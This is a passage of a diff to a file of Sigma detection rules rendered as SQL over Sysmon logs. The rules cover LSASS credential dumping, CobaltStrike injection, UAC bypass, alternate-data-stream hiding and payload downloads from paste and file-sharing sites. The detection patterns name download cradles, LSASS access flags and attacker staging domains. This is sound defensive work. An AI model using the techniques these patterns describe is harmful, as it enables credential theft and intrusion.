ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_powershell_disable_firewall.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "Code Execution via Pcwutl.dll", - "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "status": "test", - "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", - "author": "Julia Fomina, oscd.community", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1564.004" ], "falsepositives": [ - "Use of Program Compatibility Troubleshooter Helper" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwutl.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "title": "Unusual File Download From File Sharing Websites", + "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "status": "experimental", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "author": "Florian Roth (Nextron Systems)", "tags": [ 
"attack.defense_evasion", - "attack.t1202" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", - "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, 
FPT.EagleEye", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR 
TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "title": "Hidden Executable In NTFS Alternate Data Stream", + "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", + "author": "Florian Roth (Nextron Systems), @0xrawsec", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "create_stream_hash_ads_executable.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.t1218.009" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' 
OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. 
https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE 
'\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", - "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for 
downloading files.", - "author": "frack113", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" - ], - "filename": "proc_creation_win_pua_nimgrab.yml" - }, - { - "title": "PowerShell Web Download", - "id": "6e897651-f157-4d8f-aaeb-df8151488385", - "status": "experimental", - "description": "Detects suspicious ways to download files or content using PowerShell", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Scripts or tools that download files" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE 
'%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_cradles.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "DLL Execution via Rasautou.exe", - "id": "cd3d1298-eb3b-476c-ac67-12847de55813", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", "status": "test", - "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", - "author": "Julia Fomina, oscd.community", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", "status": 
"test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "Application Whitelisting Bypass via Bginfo", - "id": "aaf46cdc-934e-4284-b329-34aa701e3771", - "status": "test", - "description": "Execute VBscript code that is referenced within the *.bgi file.", - "author": "Beyu Denis, oscd.community", + "title": "Rare GrantedAccess Flags on LSASS Access", + "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software accessing LSASS process for legitimate reason" ], "level": "medium", "rule": [ - 
"SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR 
((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" ], - "filename": "proc_creation_win_lolbin_bginfo.yml" + "filename": "proc_access_win_rare_proc_access_lsass.yml" }, { - "title": "Suspicious Extrac32 Alternate Data Stream Execution", - "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", "status": "test", - 
